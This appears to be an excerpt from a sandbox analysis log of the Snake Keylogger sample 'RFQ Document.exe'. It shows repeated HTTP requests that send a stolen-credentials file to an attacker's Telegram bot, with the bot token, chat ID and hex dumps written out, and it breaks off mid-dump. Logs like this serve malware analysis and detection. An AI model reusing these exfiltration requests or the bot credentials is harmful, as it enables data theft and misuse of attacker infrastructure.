                                            2021-09-28 05:59:35 UTC375OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 38 63 38 62 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ee8c8b87Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:35 UTC376INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:35 UTC376INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12823,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            237192.168.2.450058149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:35 UTC377OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255eea46375
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:35 UTC377OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 61 34 36 33 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255eea46375Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:36 UTC377INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:36 UTC378INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12824,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            238192.168.2.450059149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:36 UTC378OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255eec0fef0
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:36 UTC378OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 63 30 66 65 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255eec0fef0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:36 UTC379INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:36 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:36 UTC379INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12825,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808776,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            239192.168.2.450060149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:36 UTC380OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255eee725a5
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:36 UTC380OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 65 37 32 35 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255eee725a5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:36 UTC380INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:36 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:36 UTC381INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12826,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808776,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            24192.168.2.449798149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:25 UTC38OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c4bb9991
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:25 UTC38OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 62 62 39 39 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c4bb9991Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:25 UTC38INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:25 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:25 UTC39INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12604,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808705,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            240192.168.2.450061149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:36 UTC381OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ef16d25f
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:36 UTC382OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 31 36 64 32 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ef16d25fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:36 UTC382INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:36 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:36 UTC382INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12827,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808776,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            241192.168.2.450062149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:37 UTC383OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ef526da2
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:37 UTC383OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 35 32 36 64 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ef526da2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:37 UTC384INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:37 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:37 UTC384INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12828,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            242192.168.2.450063149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:37 UTC385OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ef716bed
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:37 UTC385OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 37 31 36 62 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
